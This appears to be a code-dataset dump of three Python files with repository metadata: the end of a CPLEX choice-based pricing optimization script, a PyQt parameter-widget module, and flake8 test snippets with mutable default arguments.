        coefsConstr.append(co)
        sensesConstr.append('L')
        rhsConstr.append(1.0)

    # The customer chooses one alternative
    for r in range(data['R']):
        ind = []
        co = []
        for i in range(data['I_tot_exp']):
            ind.append(nameToIndex['x[' + str(i) + ']' + '[' + str(n) + ']' + '[' + str(r) + ']'])
            co.append(1.0)
        indicesConstr.append(ind)
        coefsConstr.append(co)
        sensesConstr.append('E')
        rhsConstr.append(1.0)

    # The customer cannot choose an alternative that is not offered
    for i in range(data['I_tot_exp']):
        for r in range(data['R']):
            indicesConstr.append([nameToIndex['x[' + str(i) + ']' + '[' + str(n) + ']' + '[' + str(r) + ']'],
                                  nameToIndex['y[' + str(i) + ']']])
            coefsConstr.append([1.0, -1.0])
            sensesConstr.append('L')
            rhsConstr.append(0.0)

    # The customer chooses the alternative with the highest utility
    for i in range(data['I_tot_exp']):
        for r in range(data['R']):
            ind = []
            co = []
            for j in range(data['I_tot_exp']):
                ind.append(nameToIndex['x[' + str(j) + ']' + '[' + str(n) + ']' + '[' + str(r) + ']'])
                co.append(data['U'][j,n,r])
            ind.append(nameToIndex['y[' + str(i) + ']'])
            co.append(-data['U'][i,n,r])
            indicesConstr.append(ind)
            coefsConstr.append(co)
            sensesConstr.append('G')
            rhsConstr.append(0.0)

    model.linear_constraints.add(lin_expr = [[indicesConstr[i], coefsConstr[i]] for i in range(len(indicesConstr))],
                                 senses = [sensesConstr[i] for i in range(len(sensesConstr))],
                                 rhs = [rhsConstr[i] for i in range(len(rhsConstr))])

    #########################################
    ##### ----------- SOLVE ----------- #####
    #########################################
    try:
        model.set_results_stream(None)
        #model.set_warning_stream(None)
        model.parameters.timelimit.set(172000.0)
        model.solve()
        OF = model.solution.get_objective_value()
        y = np.empty(data['I_tot_exp'])
        for i in range(data['I_tot_exp']):
            y[i] = model.solution.get_values('y[' + str(i) + ']')
        print(' OF {:10.4f}'.format(OF))
    except CplexSolverError:
        raise Exception('Exception raised during solve')

    return OF, y
if __name__ == '__main__':
    # Driver: run the choice-based optimization once per random seed.
    nSimulations = 1
    for seed in range(1,nSimulations+1):
        if nSimulations > 1:
            print('\n\n\n\n\n---------\nSEED ={:3d}\n---------\n\n'.format(seed))
        t_0 = time.time()
        # Read instance and print aggregate customer data
        data = data_file.getData(seed)
        data_file.printCustomers(data)
        # Calculate utilities for all alternatives (1 per discrete price)
        functions.discretePriceAlternativeDuplication(data)
        data_file.preprocessUtilities(data)
        functions.calcDuplicatedUtilities(data)
        t_1 = time.time()
        # Solve choice-based optimization problem (CPLEX model built above)
        model = getModel(data)
        #model.parameters.preprocessing.presolve.set(0)
        results = solveModel(data, model)
        t_2 = time.time()
        # Report wall-clock timing for the two phases.
        print('\n -- TIMING -- ')
        print('Get data + Preprocess: {:10.5f} sec'.format(t_1 - t_0))
        print('Run the model: {:10.5f} sec'.format(t_2 - t_1))
        print('\n ------------ ')
| 38.167224
| 118
| 0.470119
| 2,462
| 22,824
| 4.290414
| 0.094639
| 0.060305
| 0.037489
| 0.06873
| 0.818896
| 0.800246
| 0.794945
| 0.794566
| 0.778377
| 0.776011
| 0
| 0.011049
| 0.314012
| 22,824
| 597
| 119
| 38.231156
| 0.663601
| 0.114266
| 0
| 0.844388
| 0
| 0.002551
| 0.087384
| 0.00379
| 0
| 0
| 0
| 0
| 0
| 1
| 0.010204
| false
| 0
| 0.015306
| 0
| 0.035714
| 0.045918
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
698154120abee0087ee3efff678b97d65ae8d6ba
| 26,489
|
py
|
Python
|
MirrorMirror/augmenters/param.py
|
RubanSeven/MirrorMirror
|
47c7a1f458f87c536d068fcf249625f426920cc3
|
[
"Apache-2.0"
] | 2
|
2021-07-07T13:21:11.000Z
|
2021-09-24T06:57:16.000Z
|
MirrorMirror/augmenters/param.py
|
RubanSeven/MirrorMirror
|
47c7a1f458f87c536d068fcf249625f426920cc3
|
[
"Apache-2.0"
] | null | null | null |
MirrorMirror/augmenters/param.py
|
RubanSeven/MirrorMirror
|
47c7a1f458f87c536d068fcf249625f426920cc3
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding:utf-8 -*-
"""
@author: RubanSeven
@project: MirrorMirror
"""
from ..theme import *
from ..utils.layout import clear_layout
INDENT = 24
class ParamBase(object):
    """Common base for all parameter descriptors.

    Holds the shared state every concrete parameter exposes: a display
    name, a type tag, an optional value range, a description, the current
    value, and an optional change-notification callback.
    """

    def __init__(self):
        # Neutral defaults; concrete subclasses overwrite these fields.
        self.name = ''
        self.type = ''
        self.describe = ''
        self.value_range = None
        self.value = None
        self.value_changed = None

    def get_value(self):
        """Return the raw stored value (subclasses may post-process it)."""
        return self.value

    def set_value_changed_fun(self, value_changed):
        """Register *value_changed*, a zero-argument callback fired on edits."""
        self.value_changed = value_changed
class IntParam(ParamBase):
    """Integer parameter edited through a bounded spin box."""

    def __init__(self, value_range, default, describe='', name=None):
        super().__init__()
        self.type = 'int'
        self.name = name
        # Bug fix: the original used `assert '<message>'`, which asserts a
        # non-empty string and therefore never fails; validate for real.
        if type(value_range) is not tuple or len(value_range) != 2:
            raise ValueError('value_range is not tuple or length != 2')
        # Bug fix: the original tested value_range[0] twice; check both ends.
        if type(value_range[0]) is not int or type(value_range[1]) is not int:
            raise ValueError('value_range is not int tuple')
        self.value_range = value_range
        self.describe = describe
        self.value = default
        self.spin_box = None

    def to_widget(self):
        """Build and return the Qt editor (spin box, framed with a label
        when self.name is set)."""
        self.spin_box = ParamSpinBox()
        # Bound the editor by the declared (min, max) range.
        self.spin_box.setMinimum(self.value_range[0])
        self.spin_box.setMaximum(self.value_range[1])
        if self.value is None:
            # Default to the midpoint of the range.
            self.value = int(round((self.value_range[0] + self.value_range[1]) / 2.))
        self.spin_box.setValue(self.value)
        self.spin_box.valueChanged.connect(self.box_value_changed)
        if self.name is not None:
            # Wrap the editor in a frame with a caption label above it.
            frame = ParamFrame()
            layout = QVBoxLayout()
            label = LabelText(self.name)
            layout.addWidget(label)
            content_layout = QHBoxLayout()
            content_layout.addWidget(self.spin_box)
            layout.addLayout(content_layout)
            frame.setLayout(layout)
            return frame
        else:
            return self.spin_box

    def box_value_changed(self):
        """Mirror spin-box edits into self.value and notify listeners."""
        self.value = self.spin_box.value()
        if self.value_changed is not None:
            self.value_changed()
class FloatParam(ParamBase):
    """Float parameter edited through a bounded double spin box."""

    def __init__(self, value_range, default, describe='', name=None):
        super().__init__()
        self.type = 'float'
        self.name = name
        # Bug fix: the original used `assert '<message>'`, which asserts a
        # non-empty string and therefore never fails; validate for real.
        if type(value_range) is not tuple or len(value_range) != 2:
            raise ValueError('value_range is not tuple or length != 2')
        # Bug fix: the original tested value_range[0] twice; check both ends.
        # Ints are accepted too so existing callers passing (0, 1.5) keep working.
        if not isinstance(value_range[0], (int, float)) or not isinstance(value_range[1], (int, float)):
            raise ValueError('value_range is not float tuple')
        self.value_range = value_range
        self.describe = describe
        self.value = default
        self.spin_box = None

    def to_widget(self):
        """Build and return the Qt editor (double spin box, framed with a
        label when self.name is set)."""
        self.spin_box = ParamDoubleSpinBox()
        # Bound the editor by the declared (min, max) range.
        self.spin_box.setMinimum(self.value_range[0])
        self.spin_box.setMaximum(self.value_range[1])
        if self.value is None:
            # Bug fix: the original rounded the midpoint to an int even
            # though this is a float parameter; keep the float midpoint.
            self.value = (self.value_range[0] + self.value_range[1]) / 2.
        self.spin_box.setValue(self.value)
        self.spin_box.valueChanged.connect(self.box_value_changed)
        if self.name is not None:
            # Wrap the editor in a frame with a caption label above it.
            frame = ParamFrame()
            layout = QVBoxLayout()
            label = LabelText(self.name)
            layout.addWidget(label)
            content_layout = QHBoxLayout()
            content_layout.addWidget(self.spin_box)
            layout.addLayout(content_layout)
            frame.setLayout(layout)
            return frame
        else:
            return self.spin_box

    def box_value_changed(self):
        """Mirror spin-box edits into self.value and notify listeners."""
        self.value = self.spin_box.value()
        if self.value_changed is not None:
            self.value_changed()
class IntRangeParam(ParamBase):
    """Pair of integers (min, max) edited through two linked spin boxes."""

    def __init__(self, value_ranges, default, describe='', name=None):
        super().__init__()
        self.type = 'IntRange'
        self.name = name
        # Bug fix: `assert '<message>'` never fails; validate for real.
        if type(value_ranges) is not tuple or len(value_ranges) != 2:
            raise ValueError('value_ranges except ((a, b), (c,d))')
        for value_range in value_ranges:
            if type(value_range) is not tuple or len(value_range) != 2:
                raise ValueError('value_ranges except ((a, b), (c,d))')
        self.value_ranges = value_ranges
        self.value = default
        self.describe = describe
        self.__min_spin_box = None
        self.__max_spin_box = None

    def to_widget(self):
        """Build the min/max spin-box row (plus a caption when self.name
        is set) and return the enclosing frame."""
        layout = QHBoxLayout()
        layout.setContentsMargins(0, 0, 0, 0)
        if self.value is None:
            # Default each bound to the midpoint of its own range.
            self.value = (int(round((self.value_ranges[0][0] + self.value_ranges[0][1]) / 2.)),
                          int(round((self.value_ranges[1][0] + self.value_ranges[1][1]) / 2.)))
        self.__min_spin_box = ParamSpinBox()
        self.__min_spin_box.setMinimum(self.value_ranges[0][0])
        self.__min_spin_box.setMaximum(self.value_ranges[0][1])
        self.__min_spin_box.setValue(self.value[0])
        self.__min_spin_box.valueChanged.connect(self.min_box_value_changed)
        layout.addWidget(self.__min_spin_box)
        # Separator label between the two bounds (Chinese "to").
        txt_label = QLabel('至')
        txt_label.setMaximumWidth(24)
        layout.addWidget(txt_label)
        self.__max_spin_box = ParamSpinBox()
        self.__max_spin_box.setMinimum(self.value_ranges[1][0])
        self.__max_spin_box.setMaximum(self.value_ranges[1][1])
        self.__max_spin_box.setValue(self.value[1])
        self.__max_spin_box.valueChanged.connect(self.max_box_value_changed)
        layout.addWidget(self.__max_spin_box)
        frame = ParamFrame()
        if self.name is not None:
            frame_layout = QVBoxLayout()
            label = LabelText(self.name)
            frame_layout.addWidget(label)
            frame_layout.addLayout(layout)
            # Bug fix: the original installed `layout` (already owned by
            # frame_layout) on the frame, dropping the caption label; use
            # frame_layout, matching FloatRangeParam.
            frame.setLayout(frame_layout)
        else:
            frame.setLayout(layout)
        return frame

    def min_box_value_changed(self):
        """Keep min strictly below max, then publish the new pair."""
        if self.__min_spin_box.value() >= self.value[1]:
            # Reject the edit by restoring the previous minimum.
            self.__min_spin_box.setValue(self.value[0])
        self.value = (self.__min_spin_box.value(), self.__max_spin_box.value())
        if self.value_changed is not None:
            self.value_changed()

    def max_box_value_changed(self):
        """Keep max strictly above min, then publish the new pair."""
        if self.__max_spin_box.value() <= self.value[0]:
            # Reject the edit by restoring the previous maximum.
            self.__max_spin_box.setValue(self.value[1])
        self.value = (self.__min_spin_box.value(), self.__max_spin_box.value())
        if self.value_changed is not None:
            self.value_changed()
class FloatRangeParam(ParamBase):
    """Pair of floats (min, max) edited through two linked double spin boxes."""

    def __init__(self, value_ranges, default, describe='', name=None):
        super().__init__()
        self.type = 'FloatRange'
        self.name = name
        # Bug fix: `assert '<message>'` never fails; validate for real.
        if type(value_ranges) is not tuple or len(value_ranges) != 2:
            raise ValueError('value_ranges except ((a, b), (c,d))')
        for value_range in value_ranges:
            if type(value_range) is not tuple or len(value_range) != 2:
                raise ValueError('value_ranges except ((a, b), (c,d))')
        self.value_ranges = value_ranges
        self.value = default
        self.describe = describe
        self.__min_spin_box = None
        self.__max_spin_box = None

    def to_widget(self):
        """Build the min/max double-spin-box row (plus a caption when
        self.name is set) and return the enclosing frame."""
        layout = QHBoxLayout()
        layout.setContentsMargins(0, 0, 0, 0)
        if self.value is None:
            # Bug fix: the original rounded the float midpoints to ints;
            # keep float midpoints for a float-range parameter.
            self.value = ((self.value_ranges[0][0] + self.value_ranges[0][1]) / 2.,
                          (self.value_ranges[1][0] + self.value_ranges[1][1]) / 2.)
        self.__min_spin_box = ParamDoubleSpinBox()
        self.__min_spin_box.setMinimum(self.value_ranges[0][0])
        self.__min_spin_box.setMaximum(self.value_ranges[0][1])
        self.__min_spin_box.setValue(self.value[0])
        self.__min_spin_box.valueChanged.connect(self.min_box_value_changed)
        layout.addWidget(self.__min_spin_box)
        # Separator label between the two bounds (Chinese "to").
        txt_label = QLabel('至')
        txt_label.setMaximumWidth(24)
        layout.addWidget(txt_label)
        self.__max_spin_box = ParamDoubleSpinBox()
        self.__max_spin_box.setMinimum(self.value_ranges[1][0])
        self.__max_spin_box.setMaximum(self.value_ranges[1][1])
        self.__max_spin_box.setValue(self.value[1])
        self.__max_spin_box.valueChanged.connect(self.max_box_value_changed)
        layout.addWidget(self.__max_spin_box)
        frame = ParamFrame()
        if self.name is not None:
            frame_layout = QVBoxLayout()
            label = LabelText(self.name)
            frame_layout.addWidget(label)
            frame_layout.addLayout(layout)
            frame.setLayout(frame_layout)
        else:
            frame.setLayout(layout)
        return frame

    def min_box_value_changed(self):
        """Keep min strictly below max, then publish the new pair."""
        if self.__min_spin_box.value() >= self.value[1]:
            self.__min_spin_box.setValue(self.value[0])
        self.value = (self.__min_spin_box.value(), self.__max_spin_box.value())
        if self.value_changed is not None:
            self.value_changed()

    def max_box_value_changed(self):
        """Keep max strictly above min, then publish the new pair."""
        if self.__max_spin_box.value() <= self.value[0]:
            self.__max_spin_box.setValue(self.value[1])
        self.value = (self.__min_spin_box.value(), self.__max_spin_box.value())
        if self.value_changed is not None:
            self.value_changed()
class IntListParam(ParamBase):
    """Comma-separated list of ints edited through a line edit."""

    def __init__(self, value_range, default, describe='', name=None):
        super().__init__()
        self.type = 'IntList'
        self.name = name
        # Bug fix: `assert '<message>'` never fails; validate for real.
        if type(value_range) is not tuple:
            raise ValueError('value_range is not tuple')
        self.value_range = value_range
        self.describe = describe
        self.value = default
        self.__value_edit = None

    def to_widget(self):
        """Build and return the line-edit widget (framed with a label when
        self.name is set)."""
        self.__value_edit = ParamLineEdit()
        if self.value is None or not self.__check_form(self.value):
            # Invalid or missing default: start from an empty field.
            self.value = ''
        self.__value_edit.setText(self.value)
        self.__value_edit.textChanged.connect(self.text_changed)
        if self.name is not None:
            frame = ParamFrame()
            layout = QVBoxLayout()
            label = LabelText(self.name)
            layout.addWidget(label)
            content_layout = QHBoxLayout()
            content_layout.addWidget(self.__value_edit)
            layout.addLayout(content_layout)
            frame.setLayout(layout)
            return frame
        else:
            return self.__value_edit

    @staticmethod
    def __check_form(txt: str):
        """Return True iff *txt* is a comma-separated list of ints."""
        try:
            for part in txt.split(','):
                int(part)
        except (ValueError, AttributeError, TypeError):
            return False
        return True

    def text_changed(self):
        """Accept the edited text only when it parses as an int list."""
        if self.__check_form(self.__value_edit.text()):
            self.value = self.__value_edit.text()
            if self.value_changed is not None:
                self.value_changed()

    def get_value(self):
        """Parse the stored text into a list of ints ([] when empty)."""
        # Bug fix: ''.split(',') == [''] made int('') raise ValueError
        # whenever the field was empty; treat empty text as an empty list.
        if not self.value:
            return []
        return [int(i) for i in self.value.split(',')]
class FloatListParam(ParamBase):
    """Comma-separated list of floats edited through a line edit."""

    def __init__(self, value_range, default, describe='', name=None):
        super().__init__()
        self.type = 'FloatList'
        self.name = name
        # Bug fix: `assert '<message>'` never fails; validate for real.
        if type(value_range) is not tuple:
            raise ValueError('value_range is not tuple')
        self.value_range = value_range
        self.describe = describe
        self.value = default
        self.__value_edit = None

    def to_widget(self):
        """Build and return the line-edit widget (framed with a label when
        self.name is set)."""
        self.__value_edit = ParamLineEdit()
        if self.value is None or not self.__check_form(self.value):
            # Invalid or missing default: start from an empty field.
            self.value = ''
        self.__value_edit.setText(self.value)
        self.__value_edit.textChanged.connect(self.text_changed)
        if self.name is not None:
            frame = ParamFrame()
            layout = QVBoxLayout()
            label = LabelText(self.name)
            layout.addWidget(label)
            content_layout = QHBoxLayout()
            content_layout.setContentsMargins(0, 0, 0, 0)
            content_layout.addWidget(self.__value_edit)
            layout.addLayout(content_layout)
            frame.setLayout(layout)
            return frame
        else:
            return self.__value_edit

    @staticmethod
    def __check_form(txt: str):
        """Return True iff *txt* is a comma-separated list of floats."""
        try:
            for part in txt.split(','):
                float(part)
        except (ValueError, AttributeError, TypeError):
            return False
        return True

    def text_changed(self):
        """Accept the edited text only when it parses as a float list."""
        if self.__check_form(self.__value_edit.text()):
            self.value = self.__value_edit.text()
            if self.value_changed is not None:
                self.value_changed()

    def get_value(self):
        """Parse the stored text into a list of floats ([] when empty)."""
        # Bug fix: ''.split(',') == [''] made float('') raise ValueError
        # whenever the field was empty; treat empty text as an empty list.
        if not self.value:
            return []
        return [float(i) for i in self.value.split(',')]
class EnumListParam(ParamBase):
    """Comma-separated list restricted to the strings in value_range,
    edited through a plain line edit."""

    def __init__(self, value_range, default, describe='', name=None):
        super().__init__()
        # NOTE(review): type tag kept as 'EnumFloatList' for backward
        # compatibility, although 'EnumList' looks intended — confirm.
        self.type = 'EnumFloatList'
        self.name = name
        # Bug fix: `assert '<message>'` never fails; validate for real.
        if type(value_range) is not tuple:
            raise ValueError('value_range is not tuple')
        self.value_range = value_range
        self.describe = describe
        self.value = default
        self.__value_edit = None

    def to_widget(self):
        """Build and return the line-edit widget (framed with a label when
        self.name is set)."""
        self.__value_edit = QLineEdit()
        if self.value is None or not self.__check_form(self.value):
            # Invalid or missing default: start from an empty field.
            self.value = ''
        self.__value_edit.setText(self.value)
        self.__value_edit.textChanged.connect(self.text_changed)
        if self.name is not None:
            frame = ParamFrame()
            layout = QVBoxLayout()
            label = LabelText(self.name)
            layout.addWidget(label)
            content_layout = QHBoxLayout()
            content_layout.addWidget(self.__value_edit)
            layout.addLayout(content_layout)
            frame.setLayout(layout)
            return frame
        else:
            return self.__value_edit

    def __check_form(self, txt: str):
        """Return True iff every comma-separated item is a known enum value."""
        try:
            for item in txt.split(','):
                if item not in self.value_range:
                    return False
        except (AttributeError, TypeError):
            return False
        return True

    def text_changed(self):
        """Accept the edited text only when every item is a known value."""
        if self.__check_form(self.__value_edit.text()):
            self.value = self.__value_edit.text()
            if self.value_changed is not None:
                self.value_changed()

    def get_value(self):
        """Return the selected enum strings as a list ([] when empty)."""
        # Bug fix: ''.split(',') == [''] returned a bogus one-element list
        # for empty text; return an empty list instead.
        if not self.value:
            return []
        return self.value.split(',')
class EnumParam(ParamBase):
    """Single choice from a fixed set of strings, edited via a combo box."""

    def __init__(self, value_range, default, describe='', name=None):
        super().__init__()
        self.type = 'Enum'
        self.name = name
        # Bug fix: `assert '<message>'` never fails; validate for real.
        if type(value_range) is not tuple:
            raise ValueError('value_range is not tuple')
        self.value_range = value_range
        self.describe = describe
        self.value = default
        self.__combo_box = None

    def to_widget(self):
        """Build and return the combo box (framed with a label when
        self.name is set)."""
        self.__combo_box = ComboBox()
        if self.value is None:
            # Default to the first declared option.
            self.value = self.value_range[0]
        for v in self.value_range:
            self.__combo_box.addItem(v)
        self.__combo_box.setCurrentText(self.value)
        self.__combo_box.currentIndexChanged.connect(self.selection_change)
        if self.name is not None:
            layout = QVBoxLayout()
            label = LabelText(self.name)
            layout.addWidget(label)
            content_layout = QHBoxLayout()
            content_layout.addWidget(self.__combo_box)
            layout.addLayout(content_layout)
            frame = ParamFrame()
            frame.setLayout(layout)
            return frame
        else:
            return self.__combo_box

    def selection_change(self, i):
        """Mirror the combo-box selection into self.value and notify."""
        self.value = self.__combo_box.currentText()
        if self.value_changed is not None:
            self.value_changed()

    def get_value(self):
        """Return the selected option; the strings 'True'/'False' are
        converted to real booleans."""
        if type(self.value) is str:
            if self.value == 'True':
                return True
            if self.value == 'False':
                return False
        return self.value
class DictParam(ParamBase):
    """Composite parameter: a named group of child parameters rendered as
    a vertical list, returning a dict of their values."""

    def __init__(self, children, describe='', name=None):
        super().__init__()
        self.type = 'Dict'
        self.name = name
        self.children = children
        self.describe = describe
        self.__param_group = None

    def to_widget(self):
        """Build a labelled widget per child, stacked top-to-bottom, and
        return the enclosing frame."""
        self.__param_group = QVBoxLayout()
        self.__param_group.setDirection(QBoxLayout.TopToBottom)
        for child_name, child_item in self.children.items():
            # Each child gets its own caption above its editor widget.
            child_layout = QVBoxLayout()
            child_layout.addWidget(LabelText(child_name))
            child_layout.addWidget(child_item.to_widget())
            self.__param_group.addLayout(child_layout)
        frame = ParamFrame()
        if self.name is None:
            frame.setLayout(self.__param_group)
        else:
            # Prepend the group caption above the children.
            layout = QVBoxLayout()
            layout.addWidget(LabelText(self.name))
            self.__param_group.addSpacing(4)
            content_layout = QHBoxLayout()
            content_layout.addLayout(self.__param_group)
            layout.addLayout(content_layout)
            frame.setLayout(layout)
        return frame

    def set_value_changed_fun(self, value_changed):
        """Propagate the change callback to every child parameter."""
        for child_item in self.children.values():
            child_item.set_value_changed_fun(value_changed)

    def get_value(self):
        """Return {child name: child value} for all children."""
        return {child_name: child_item.get_value()
                for child_name, child_item in self.children.items()}
class ChoiceParam(ParamBase):
    # One-of-many parameter: a combo box selects a key of `value_range`
    # (a dict mapping choice name -> child Param), and the selected child's
    # own editor widget is shown beneath the combo box.
    def __init__(self, value_range, default, describe='', name=None):
        super().__init__()
        self.type = 'Choice'
        self.name = name
        if type(value_range) is not dict:
            # NOTE(review): `assert '<string>'` is always true, so this
            # validation never fires — confirm intended behavior.
            assert 'value_range is not dict'
        self.value_range = value_range
        self.describe = describe
        self.value = default  # currently selected key of value_range
        self.__combo_box = None
        self.__items = list()
        self.__content_layout = None
    def to_widget(self):
        # Build the combo box plus the active child's widget.
        if self.value is None or self.value not in self.value_range:
            # Fall back to the first declared choice.
            self.value = list(self.value_range.keys())[0]
        self.__combo_box = ComboBox()
        self.__items = list()
        for k in self.value_range:
            self.__combo_box.addItem(k)
            self.__items.append(self.value_range[k])
        self.__combo_box.setCurrentText(self.value)
        self.__combo_box.currentIndexChanged.connect(self.selection_change)
        # (Earlier radio-button based implementation, kept for reference.)
        # self.__radio_group = QButtonGroup()
        # item_layout = QVBoxLayout()
        # item_layout.setDirection(QBoxLayout.TopToBottom)
        # for choice_id, choice_item in enumerate(self.value_range):
        #     radio_layout = QHBoxLayout()
        #     radio_layout.setDirection(QBoxLayout.LeftToRight)
        #     item_widget = choice_item.to_widget()
        #     rb = QRadioButton(item_widget)
        #     if choice_id == self.value:
        #         rb.click()
        #     self.__radio_group.addButton(rb, choice_id)
        #     radio_layout.addWidget(rb)
        #     radio_layout.addWidget(item_widget)
        #     radio_layout.addStretch()
        #     item_layout.addLayout(radio_layout)
        # item_layout.addStretch()
        # for v in self.value_range:
        #     self.__combo_box.addItem(v)
        # value_idx = self.value_range.index(self.value)
        # self.__combo_box.setCurrentIndex(self.value_range.index(self.value))
        # self.__combo_box.setCurrentText(self.value)
        # self.__radio_group.buttonClicked.connect(self.selection_change)
        frame = ParamFrame()
        self.__content_layout = QVBoxLayout()
        self.__content_layout.setContentsMargins(0, 0, 0, 0)
        self.__content_layout.addWidget(self.__combo_box)
        item = self.value_range[self.value]
        if type(item) is not DefaultParam:
            # DefaultParam has no editable widget; only real params are shown.
            self.__content_layout.addWidget(item.to_widget())
        if self.name is not None:
            layout = QVBoxLayout()
            label = LabelText(self.name)
            layout.addWidget(label)
            layout.addLayout(self.__content_layout)
            frame.setLayout(layout)
        else:
            frame.setLayout(self.__content_layout)
        return frame
    # def selection_change(self):
    #     self.value = self.__radio_group.checkedId()
    #     if self.value_changed is not None:
    #         self.value_changed()
    def selection_change(self):
        # Swap the displayed child widget when the combo selection changes.
        self.value = self.__combo_box.currentText()
        while self.__content_layout.count() > 1:
            # Remove everything below the combo box (layout index 0),
            # deleting widgets and recursively clearing nested layouts.
            item = self.__content_layout.takeAt(1)
            widget = item.widget()
            if widget is not None:
                widget.deleteLater()
            else:
                clear_layout(item.layout())
        item = self.value_range[self.value]
        if type(item) is not DefaultParam:
            self.__content_layout.addWidget(item.to_widget())
        if self.value_changed is not None:
            self.value_changed()
    def set_value_changed_fun(self, value_changed):
        # Register the callback on this param and on every child choice.
        self.value_changed = value_changed
        for k in self.value_range:
            self.value_range[k].set_value_changed_fun(value_changed)
    def get_value(self):
        # Delegate to the currently selected child parameter.
        return self.value_range[self.value].get_value()
class MultiSelectParam(ParamBase):
    """One-or-more selection from a fixed set, edited via check boxes.

    self.value holds the list of selected indices into value_range; the
    widget refuses to let the selection become empty.
    """

    def __init__(self, value_range, default, describe='', name=None):
        super().__init__()
        self.type = 'MultiSelect'
        self.name = name
        # Bug fix: `assert '<message>'` never fails; validate for real.
        if type(value_range) is not tuple:
            raise ValueError('value_range is not tuple')
        self.value_range = value_range
        self.describe = describe
        self.value = default
        self.cb_list = list()

    def to_widget(self):
        """Build one check box per option, stacked vertically, and return
        the enclosing frame."""
        if self.value is None or len(self.value) == 0:
            # At least one option must stay selected; default to the first.
            self.value = [0]
        self.cb_list = list()
        item_layout = QVBoxLayout()
        item_layout.setDirection(QBoxLayout.TopToBottom)
        for select_id, select_value in enumerate(self.value_range):
            cb = QCheckBox(str(select_value))
            if select_id in self.value:
                cb.setChecked(True)
            cb.stateChanged.connect(self.selection_change)
            self.cb_list.append(cb)
            item_layout.addWidget(cb)
        frame = ParamFrame()
        if self.name is not None:
            layout = QVBoxLayout()
            label = LabelText(self.name)
            layout.addWidget(label)
            content_layout = QHBoxLayout()
            content_layout.addLayout(item_layout)
            layout.addLayout(content_layout)
            frame.setLayout(layout)
        else:
            frame.setLayout(item_layout)
        return frame

    def is_empty(self):
        """Return True when no check box is currently ticked."""
        for tmp_cb in self.cb_list:
            if tmp_cb.isChecked():
                return False
        return True

    def selection_change(self):
        """Re-derive the selected indices; veto an empty selection."""
        if self.is_empty():
            # Re-tick the previously first-selected box instead of
            # allowing the selection to become empty.
            self.cb_list[self.value[0]].setChecked(True)
        else:
            self.value = [cb_id for cb_id, tmp_cb in enumerate(self.cb_list) if tmp_cb.isChecked()]
            if self.value_changed is not None:
                self.value_changed()

    def set_value_changed_fun(self, value_changed):
        """Register the change-notification callback."""
        self.value_changed = value_changed

    def get_value(self):
        """Return the selected option(s): a list when several are picked,
        the bare option when exactly one is."""
        if len(self.value) > 1:
            return [self.value_range[v] for v in self.value]
        else:
            return self.value_range[self.value[0]]
class DefaultParam(ParamBase):
    """Placeholder parameter: a fixed value with no editable widget."""

    def __init__(self, describe='', default=None, name='default'):
        super().__init__()
        self.type = 'None'
        self.name = name
        self.describe = describe
        self.value = default

    def to_widget(self):
        """Render as a plain label only — there is nothing to edit."""
        return LabelText(self.name)

    def set_value_changed_fun(self, value_changed):
        """No-op: a static parameter never changes."""
        pass

    def get_value(self):
        """Return the fixed default value."""
        return self.value
| 35.318667
| 100
| 0.589037
| 3,067
| 26,489
| 4.785458
| 0.057711
| 0.144103
| 0.052463
| 0.020985
| 0.836343
| 0.813177
| 0.795599
| 0.766097
| 0.741909
| 0.724876
| 0
| 0.005688
| 0.316358
| 26,489
| 749
| 101
| 35.365821
| 0.804793
| 0.093322
| 0
| 0.773381
| 0
| 0
| 0.022733
| 0
| 0
| 0
| 0
| 0
| 0.02518
| 1
| 0.098921
| false
| 0.001799
| 0.003597
| 0.01259
| 0.19964
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
69a8d58d0a743cd8fe85a28f8ed1360c83100b6f
| 1,664
|
py
|
Python
|
tests/texts/mutables.py
|
Intsights/flake8-intsights
|
b3785a3be855e05090641696e0648486107dba72
|
[
"MIT"
] | 12
|
2020-02-18T17:47:57.000Z
|
2021-07-13T10:23:40.000Z
|
tests/texts/mutables.py
|
Intsights/flake8-intsights
|
b3785a3be855e05090641696e0648486107dba72
|
[
"MIT"
] | 7
|
2020-02-25T12:14:11.000Z
|
2020-12-01T08:14:58.000Z
|
tests/texts/mutables.py
|
Intsights/flake8-intsights
|
b3785a3be855e05090641696e0648486107dba72
|
[
"MIT"
] | 1
|
2020-07-01T15:49:28.000Z
|
2020-07-01T15:49:28.000Z
|
mutables_test_text_001 = '''
def function(
param,
):
pass
'''
mutables_test_text_002 = '''
def function(
param=0,
):
pass
'''
mutables_test_text_003 = '''
def function(
param={},
):
pass
'''
mutables_test_text_004 = '''
def function(
param=[],
):
pass
'''
mutables_test_text_005 = '''
def function(
param=tuple(),
):
pass
'''
mutables_test_text_006 = '''
def function(
param=list(),
):
pass
'''
mutables_test_text_007 = '''
def function(
param_one,
param_two,
):
pass
'''
mutables_test_text_008 = '''
def function(
param_one,
param_two=0,
):
pass
'''
mutables_test_text_009 = '''
def function(
param_one,
param_two={},
):
pass
'''
mutables_test_text_010 = '''
def function(
param_one,
param_two=[],
):
pass
'''
mutables_test_text_011 = '''
def function(
param_one,
param_two=list(),
):
pass
'''
mutables_test_text_012 = '''
def function(
param_one,
param_two=tuple(),
):
pass
'''
mutables_test_text_013 = '''
def function(
param_one,
param_two,
param_three,
):
pass
'''
mutables_test_text_014 = '''
def function(
param_one,
param_two,
param_three=0,
):
pass
'''
mutables_test_text_015 = '''
def function(
param_one,
param_two=0,
param_three={},
):
pass
'''
mutables_test_text_016 = '''
def function(
param_one,
param_two=[],
param_three={},
):
pass
'''
mutables_test_text_017 = '''
def function(
param_one={},
param_two=0,
param_three={},
):
pass
'''
mutables_test_text_018 = '''
def function(
param_one=0,
param_two=[],
param_three=0,
):
pass
'''
| 13.102362
| 28
| 0.602764
| 203
| 1,664
| 4.527094
| 0.152709
| 0.235038
| 0.313384
| 0.369967
| 0.849837
| 0.681175
| 0.591948
| 0.443961
| 0.4037
